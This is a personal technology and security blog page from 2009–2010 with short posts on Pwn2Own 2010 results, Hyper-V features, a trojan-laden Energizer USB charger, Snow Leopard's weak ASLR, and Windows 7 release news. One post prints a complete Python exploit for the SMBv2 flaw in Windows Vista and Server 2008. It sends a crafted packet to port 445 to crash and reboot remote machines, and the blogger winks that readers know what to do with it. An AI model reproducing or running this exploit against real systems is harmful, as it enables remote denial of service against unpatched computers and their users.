What I Know It’s About Experience

29Mar/10Off

Pwn2Own 2010 News

Pwn2Own is the brain child of Dragos Ruiu, the founder and director of the CanSecWest security conference.  This is an annual conference held every year in Vancouver, Canada (usually late March).  If you have never been to it I highly recommend the event. This is probably the most technically advanced conference world wide, even more so then events like Blackhat or Hack In The Box.  It tends to be smaller, about 200 people.  The Pwn2Own is an event where conference attendees are challenged to hack a fully patched device.  The first contest began in 2007 with just a Macbook laptop, but has grown to include items such as a Windows laptop and iPhone.  What makes this contest different then other hacking events is the caliber of contestants.  You literally have some of the best exploit developers in the world. They are motivated with a total of $100,000, but in addition gain tremendous bragging rights.  Many of the contestants said it took them 1-2 weeks to develop the exploits, in some cases two people worked together.  That averages 80-160 man hours to create an exploit. This year at the contest the following fully patched systems were successfully hacked.  
 
Firefox on 64-bit Windows 7
  Internet Explorer 8 on 64-bit Windows 7
  Safari on Mac OS X
  iPhone
So, what does that mean to us?  In general three things.
  1. Developing a new exploit takes a lot of work, however with enough time and talent anything can be hacked, even something fully patched.
  2. In general, most criminals are simply too lazy or do not have the skills to develop such advanced exploits.  But then again, they don't have to.  The simple, well known exploits and vulnerabilities are working just fine.
  3. The only organizations that would have to worry about such attacks are high-value targets. If you believe you are such a target, and that threats may target specifically you, contests like this demonstrate that no matter how much prevention you implement it can be bypassed. Detection and incident response are just as important as prevention. 
via HoneyTech Security Update
Tagged as: , , , , , No Comments
19Mar/10Off

Dynamic Memory Coming To Hyper-V

Jeff Woolsey: I’ve had the pleasure of talking with customers in the last few months and the Hyper-V R2 reception has been nothing but unequivocally positive. Whether it’s been folks in small, medium or the enterprise, they appreciate the new capabilities in Windows Server 2008 R2 Hyper-V and the free Microsoft Hyper-V Server 2008 R2. At the same time, we’re always listening to our customers to better understand their business requirements and requests so we know know what to build for subsequent releases. Today, we’re pleased to announce new capabilities that will enhance both virtualized server and virtualized desktop deployments:

Remote FX: With Microsoft RemoteFX, users will be able to work remotely in a Windows Aero desktop environment, watch full-motion video, enjoy Silverlight animations, and run 3D applications within a Hyper-V VM – all with the fidelity of a local-like performance. For more info, check out Max’s blog here.
Hyper-V Dynamic Memory: With Hyper-V Dynamic Memory, Hyper-V will enable greater virtual machine density suitable for servers and VDI deployments.

 

These are really nice new capabilities read more here

Tagged as: , , , No Comments
9Mar/10Off

INFECTED HARDWARE !!

I received this interesting news today from my friend Lance. he said that he have read of several instances where hardware was infected but this is the first time he seen it officially reported in a CERT alert. The Energizer DUO, a USB-powered battery recharger was distributing malicious code that infected windows systems.

The hardware device itself does not infect the computer.  Instead the infection happens from the software that comes with the device.  Energizer is currently working with CERT to learn how their software was infected.  In addition, only 9 out of 42 anti-virus products were able to detect the virus.

Lesson learned, it does not matter where you get the software from, scan it before installing it.  Be sure your policies are enforcing this.

Technical details about this trojan can be found here

via: HoneyTech Security Update

Tagged as: , , , No Comments
15Feb/10Off

Bing Maps Shines at TED Conference

                     

Tagged as: , , No Comments
22Oct/09Off

Windows 7 NY Launch Event :)

Tagged as: , 2 Comments
17Sep/09Off

Charlie Miller: Snow Leopard is not as secure as Windows Vista/7

Snow Leopard lacks security features that are built in to Windows XP, Windows Vista and Windows 7, a noted Mac researcher has said. Dubbed ASLR, for address space layout randomization, the technology randomly assigns data to memory to make it tougher for attackers to determine the location of critical operating system functions, and thus make it harder for them to craft reliable exploits.
"Apple didn't change anything," said Charlie Miller, of Baltimore-based Independent Security Evaluators, the co-author of The Mac Hacker's Handbook, and winner of two consecutive "Pwn2own" hacker contests. "It's the exact same ASLR as in Leopard, which means it's not very good."

Snow Leopard lacks security features that are built in to Windows XP, Windows Vista and Windows 7, a noted Mac researcher has said. Dubbed ASLR, for address space layout randomization, the technology randomly assigns data to memory to make it tougher for attackers to determine the location of critical operating system functions, and thus make it harder for them to craft reliable exploits.

"Apple didn't change anything," said Charlie Miller, of Baltimore-based Independent Security Evaluators, the co-author of The Mac Hacker's Handbook, and winner of two consecutive "Pwn2own" hacker contests. "It's the exact same ASLR as in Leopard, which means it's not very good."

Interesting news isn’t it :) you can continue reading @ the source here :)
Tagged as: , , , , No Comments
9Sep/09Off

Remote 0day Exploit for Vista, 2008 in the Wilde

There is a flaw in SMB2.0 which exists (I mean the SMBv2 itself not the vulnerability) in windows vista, 2008,7 and 2008 R2 but only Windows Vista & 2008 are vulnerable. If you exploited this flaw successfully you will crash & reboot any vista or 2008 remotely (of course only if SMB 445 port open :) ). Anyhow here is the exploit code it's written in python :) & I will assume that you know what to do with it :)

# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it
dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Tagged as: , , , 2 Comments
6Aug/09Off

Windows 7 NOW ON MSDN\Technet, GO Get it!!

Go Get it, What You Waiting For :)   

I already activated my desktop, laptop & netbook copies :)

Tagged as: , , 4 Comments
23Jul/09Off

Windows 7 RTM announcement at MGX

Windows 7 Sneak-Peak from MGX (Video)

Windows 7 will be available for all MSDN\Technet subscribers on 
6-8-2009

Tagged as: , , No Comments
12Jul/09Off

Windows 7 Released To Manufacture (RTM)

YES! NO   

 

Build: 7600.16384.090710-1945

Just wait for a leak :)  
Update: July 14, 2009 12:30AM

SIZE: 3,224,717,312 bytes
CRC: 1EE7DC6F
MD5: E6CE9644D0C7A8E1C950D257A7B2C8A4
SHA1: 31849B315290EFABFD81F967ED3C553D82925E4C
 
Update: July 14, 2009 01:15AM
Microsoft blogger Brandon LeBlanc has provided an official update on the Windows 7 release to manufacturing (RTM).

In a blog posting to the Windows Team blog, LeBlanc admits "there have been many rumors surrounding RTM" over the past week and notes "we are close, but have not yet signed off on Windows 7. When we RTM you will most certainly hear it here. As we've said all along, we will RTM Windows 7 when it's ready. As previously stated, we expect Windows 7 to RTM in the 2nd half of July."

 

 

 

Tagged as: , No Comments
   Older Entries »

Calendar

September 2010
S S M T W T F
« Aug    
 123
45678910
11121314151617
18192021222324
252627282930  

RSS Free Softwares

Tag Cloud

Announcement Antivirus Apple auditors benchmark Beta1 Browser Business Risk Information Security Debug documentation Editions Education Certification Knowledge Experience Federated Search Forensic Hacked Hardware HITB 2008 I'M A PC Internet Broken Live MacBook Micorosft Microsoft Microsoft ads Microsoft ICE nVidia Defective Oracle PDC 2008 Projects Recorder Security Security Awareness Security Talk Snow Leopard Sun SuperFetch UAC USB 3.0 video Wave3 Windows Windows7 Windows 2008 R2 Windows Vista WP-RTL

Posts Archives

Friends